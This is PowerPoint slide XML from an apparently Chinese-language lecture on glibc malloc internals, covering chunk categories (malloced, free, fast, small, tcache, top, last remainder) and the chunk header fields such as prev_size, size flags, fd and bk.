                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>bk_nextsize</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p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="矩形 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{166E0DED-28C0-4190-866B-690CC29D18A9}"/>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sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="矩形 5">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{8D3F76CA-9309-492B-9CE0-550A998FCD52}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4139951" y="1215326"/>
            <a:ext cx="3912095" cy="584775"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="3200" b="1" dirty="0">
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>chunk </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="3200" b="1" dirty="0">
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>的具体实现</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="215259764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4" name="文本框 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A0895A9D-698F-4E4A-8F7F-DCE02A15C4F4}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1658256" y="1807750"/>
            <a:ext cx="2791149" cy="584775"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="3200" b="1" dirty="0">
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>chunk </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="3200" b="1" dirty="0">
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>的分类</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="9" name="矩形 8">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{FEB2A288-ECD9-4911-AA4D-D8666709070C}"/>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sp>
        <p:nvSpPr>
          <p:cNvPr id="2" name="文本框 1">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D56F0253-9DCB-4083-BBEF-7D3779A1472C}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2572426" y="2825271"/>
            <a:ext cx="1593706" cy="1354217"/>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按状态</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="2400"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malloced</a:t>
            </a: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free</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="20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CF440F0-A79E-4957-A821-9781148596CD}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5462076" y="2779105"/>
            <a:ext cx="1267848" cy="1969770"/>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按大小</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="2400"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fast</a:t>
            </a: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small</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="285750" indent="-285750">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0" err="1">
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>targe</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN"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2000" dirty="0" err="1">
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>tcache</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="20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1341D0F3-0A7E-4818-9C3E-99EE2FF5057D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8025868" y="2779105"/>
            <a:ext cx="3048783" cy="1446550"/>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按特定功能</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top</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chunk</a:t>
            </a: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last remainder chunk</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="372656229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4" name="文本框 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A0895A9D-698F-4E4A-8F7F-DCE02A15C4F4}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1101622" y="2751150"/>
            <a:ext cx="3435556" cy="584775"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="3200" b="1" dirty="0">
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>malloced chunk</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="3200" b="1"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748BE0E1-D079-4668-AD06-B451592781DB}"/>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6553202" y="2324100"/>
            <a:ext cx="5114925" cy="2209800"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="8" name="矩形 7">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{649B9D90-6693-4A9C-8038-9E413FD71C52}"/>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sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="文本框 5">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{EF43411A-5AE2-482A-8651-C4678FC8EACC}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="563372" y="3429000"/>
            <a:ext cx="5075428"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已被分配且填写了相应数据的</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0">
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>chunk</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63389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9" name="矩形 8">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{FEB2A288-ECD9-4911-AA4D-D8666709070C}"/>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pic>
        <p:nvPicPr>
          <p:cNvPr id="5" name="图片 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{19F5152D-27CC-4EDF-A600-10ECA98D2227}"/>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6096000" y="2215723"/>
            <a:ext cx="5114925" cy="3257550"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="文本框 5">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{0D4CCF9D-4DB1-42CF-B51D-E4C003DC1CCD}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1630805" y="2844225"/>
            <a:ext cx="2377189" cy="584775"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="3200" b="1" dirty="0">
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>free chunk</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="3200"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ACA2784-8576-4AD1-BE2B-DA464BC89194}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="738885" y="3429000"/>
            <a:ext cx="4161028" cy="830997"/>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rPr>
              <a:t>被释放掉的</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0">
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>malloced chunk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0">
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>成为</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0">
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>free chunk</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3173675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8" name="矩形 7">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A98720B4-6763-4FDE-8486-84858A318A2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pic>
        <p:nvPicPr>
          <p:cNvPr id="6" name="Picture 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{9087ADB7-82E4-4784-BC06-A7620EC72F6E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1" noChangeArrowheads="1" noCrop="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip>
            <a:extLst>
              <a:ext uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
                <a14:useLocalDpi xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main" val="0"/>
              </a:ext>
            </a:extLst>
          </a:blip>
          <a:srcRect/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="7292089" y="574981"/>
            <a:ext cx="3228975" cy="601980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A38B9681-3CC0-4FDB-AA68-F96BBF2E2B92}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1630805" y="2844225"/>
            <a:ext cx="2271584" cy="584775"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="3200" b="1" dirty="0">
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>top chunk</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="3200"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25512B09-2395-4BFB-9445-C7809A3217B6}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="738885" y="3429000"/>
            <a:ext cx="4161028" cy="830997"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0">
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>arena</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0">
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>中从未被使用过的内存区域</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="6542265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8" name="矩形 7">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A98720B4-6763-4FDE-8486-84858A318A2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sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="文本框 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{94875F5E-8D8E-4D80-AFBD-B03CC16722DD}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="550380" y="2844225"/>
            <a:ext cx="4538037" cy="584775"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="3200" b="1" dirty="0">
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>last remainder chunk</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="3200" b="1"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221A0630-3344-46EB-AEAD-D2B5FE908453}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="738885" y="3429000"/>
            <a:ext cx="4161028" cy="830997"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0">
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>malloc</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0">
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>分割原</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0">
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>chunk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0">
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>后剩余的部分</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="3" name="图片 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{0B16F5F4-C470-4757-9C39-A0588AC2070D}"/>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7103585" y="1843087"/>
            <a:ext cx="3381375" cy="3171825"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="409275247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8" name="矩形 7">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A98720B4-6763-4FDE-8486-84858A318A2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sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="文本框 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{94875F5E-8D8E-4D80-AFBD-B03CC16722DD}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="875500" y="919723"/>
            <a:ext cx="3676006" cy="584775"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="3200" b="1" dirty="0">
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>Chunk </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="3200" b="1" dirty="0">
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>的微观结构</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="文本框 5">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{221A0630-3344-46EB-AEAD-D2B5FE908453}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2080005" y="2013225"/>
            <a:ext cx="2400555" cy="3785652"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="342900" indent="-342900">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" b="1" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg2"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>prev_size</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="2400" b="1" dirty="0">
              <a:solidFill>
                <a:schemeClr val="bg2"/>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b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg2"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>size</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="800100" lvl="1" indent="-342900">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg2"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>size</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="800100" lvl="1" indent="-342900">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg2"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>A</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="800100" lvl="1" indent="-342900">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg2"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>M</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="800100" lvl="1" indent="-342900">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg2"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>P</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="342900" indent="-342900">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" b="1" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg2"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>fd</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="2400" b="1" dirty="0">
              <a:solidFill>
                <a:schemeClr val="bg2"/>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b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg2"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>bk</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="342900" indent="-342900">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" b="1" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg2"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>fd_nextsize</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="2400" b="1" dirty="0">
              <a:solidFill>
